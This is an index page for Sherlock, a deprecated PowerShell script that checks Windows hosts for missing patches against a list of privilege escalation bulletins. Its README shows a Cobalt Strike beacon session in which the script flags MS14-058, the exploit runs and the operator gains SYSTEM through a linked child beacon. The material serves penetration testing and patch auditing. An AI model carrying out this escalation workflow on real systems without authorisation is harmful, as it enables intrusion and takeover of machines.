Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/rasta-mouse/sherlock
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
https://github.com/rasta-mouse/sherlock
Last synced: 11 days ago
JSON representation
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
- Host: GitHub
- URL: https://github.com/rasta-mouse/sherlock
- Owner: rasta-mouse
- License: gpl-3.0
- Archived: true
- Created: 2017-04-02T16:01:53.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2018-10-10T09:10:45.000Z (about 6 years ago)
- Last Synced: 2024-05-02T02:23:16.617Z (7 months ago)
- Language: PowerShell
- Homepage:
- Size: 31.3 KB
- Stars: 1,837
- Watchers: 80
- Forks: 424
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
> Deprecated. Have a look at [Watson](https://github.com/rasta-mouse/Watson) instead.
# Sherlock
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
## Currently looks for:
* MS10-015 : User Mode to Ring (KiTrap0D)
* MS10-092 : Task Scheduler
* MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
* MS13-081 : TrackPopupMenuEx Win32k NULL Page
* MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
* MS15-051 : ClientCopyImage Win32k
* MS15-078 : Font Driver Buffer Overflow
* MS16-016 : 'mrxdav.sys' WebDAV
* MS16-032 : Secondary Logon Handle
* MS16-034 : Windows Kernel-Mode Drivers EoP
* MS16-135 : Win32k Elevation of Privilege
* CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc## Basic Usage:
```
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rastabeacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytesbeacon> powershell Find-MS14058
[*] Tasked beacon to run: Find-MS14058
[+] host called home, sent: 20 bytes
[+] received output:Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerablebeacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
```